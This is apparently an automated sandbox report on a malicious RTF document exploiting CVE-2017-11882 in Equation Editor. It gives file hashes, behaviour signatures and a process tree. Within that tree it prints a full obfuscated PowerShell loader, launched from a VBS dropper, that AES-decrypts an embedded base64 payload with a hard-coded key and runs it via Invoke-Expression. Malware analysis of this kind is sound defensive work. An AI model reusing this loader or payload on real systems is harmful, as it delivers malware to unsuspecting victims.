Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
-
submitted
30-07-2024 01:19
General
-
Target
SecuriteInfo.com.Exploit.CVE-2017-11882.123.23495.2369.rtf
-
Size
72KB
-
MD5
625a04a93d1ab1ffac8c456c25d98b93
-
SHA1
f52a29f1a540c218a8587d4fc81ff209288a7f3c
-
SHA256
c0587da12abc35d421d5cfb374785b021b0c6c07868d12202ea2074b3cf39def
-
SHA512
159775ed99ef6eb7ff9edb193208a1831c43074c737d608d78c91bd8bf35d4a801d914b4214958aad38edec943a920389a3e980233b8e9f58c3864986470dec9
-
SSDEEP
384:l0uKlMPlWYlweoKVLliD/k4gphmStYaFiYXl83D2jIcwMfXEVNkKT:ykXIKVLlOk4gphm4Xl8D2jIcwM/2p
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.CVE-2017-11882.123.23495.2369.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mywifeisbeautiful.vBS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI33875419224826702940537577739181CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIri80kRp8Wd309o8uMjCHZGUii0bRMcsrbHHHL+X45oYyzuF4S3e6GVM0e+pl2BU27T+o3U47DIQXyCEbbsY3gN+NKfJGuxcZnCvfWXviSDQkn56OjGYRen9drdjFnWfy8HofbxfsNtUbi+sY/E64/LcGt/c/aVckAqSjibPU7JN7xVQyyVoSZIc1s1y/BzcU37eACUI0rJiga/2nnEROZP45lmQLp/5tepXk/4Nsc9eQ79NMp1rgqhHFpj5hPCuW5mTO5cwo2MuIOYeAfs9wRhfN/2m9G1xcBDzLZ/GrarNq3C+T8gaVFNj5N1wFpi77cdr3iOxIJw3jColqQwqtIBNgAhVDnbvzyqp/Nelf29Ss61/TMdjO2vBdodzQroMOv3JbrfuEgpgYDTLKnHpuTjy+bkvtxIr3YoWNYoHm/m0cps4EBx0HjBlchM5Y0EyVTQXB7H/iInAQVNMc9K4ZUzpcK4A9oBNmzkrv+BJ//16W/ph5Ud31mXNkD5wcg+rablZf4oO6x65fTqBb6GwjjLp/CCSoi+ghzv+n7XvEMN072z13Kr0aKLuUpRkpFbOMxOl1gz+W9L5nzZYEonr8Ef7QCXBWH1efAfmw/rOjJk4GS3n67D+Xt+Xi4nagkgXuz3q4x3sb/BC9fBOa65aM7K6ArL518tiDqrdMwuw+PRpCUsbiNRKQTdSaM7XrTGuX0TaIde76/r+vdHl9dhrkNKbWxL6aUXY//+ltZ8KD1tKSHOjrPl0V66LW2x1rJbmeaoEDQ/mziRwi9uyvQShtGrUPlTcF8BTVNYQlVxj4tCMvYndNjMKaq5pKQK4ZBAH4XN1D1Uyc8h98jAggebme+4gNq15kkfu5ngfMrq8xUJsm+F+NgwtDFthidIWpmay2/isYSX+VXxTA9UORNSZ1xHJcv/4N2ew+y2xhayj7WNIs9CwGBIpv5WyKwc2WwMSm15E/Q0FIVV079eGLQZ5zT9c36kriUQtLMKwm/XqsZZOJ8yoXtr1WIG4DYjevVCE04Y91oXiMgIvmBrLNYjFVF63b20jnRoNOAsa0cleimMV4rca9PaoxA015MRIfXuxoEW0mlOBGfp2SJR5T555CZsyecbKejwhlHrKm1Ke4h9qflRn+Rc9pEinfGjCvI+F5Md2QKTQmi5ZlDk3WAnL2X+9+hYNMp4dc1j6gEeVBCHmnSE92wxQL2LmgDVkq7pfY3ggKxwUr7LajvylgkdB5u2oA0hEMcRmcszoSNx01RdJBPea816PQMD6A9w36sLm5CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5a6ae21a9ae46ca837634d037509e3099
SHA18f7000b5366e5e3bd95dc2eb789a3615a6c811ce
SHA2569c1b7b9250f77145e8cca0ad1a6c05c8fefee359e64b8d8cc311fbf5d90c15d9
SHA512ebff74274d4e682bdf18ada50a3b364fb0ccafac4db2a5f836becd66732f4375584b4e686fcf251f67fe8cf0cfb7e688aaaf7db8890c4c70e806d37eda78045f
-
Filesize
565KB
MD502b6b577cf925689c42545770b951ac6
SHA1dce1c459654f5bbfd069f76593df171c95a07b18
SHA256fd2dcb6500c21ea089a8bf7867f50a1bbd066e3856128c1d283276e1cb6e0689
SHA51282ddaf057d2a2b9da9849a79317a9dd1a97b2d5967ec61ee79687232b27ce3bdcb5cc2194dceda3ff27f5c2daa3d6692b51a2eb3551410264336d35cced412b5
-
Filesize
4KB
-
Filesize
44KB
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
64KB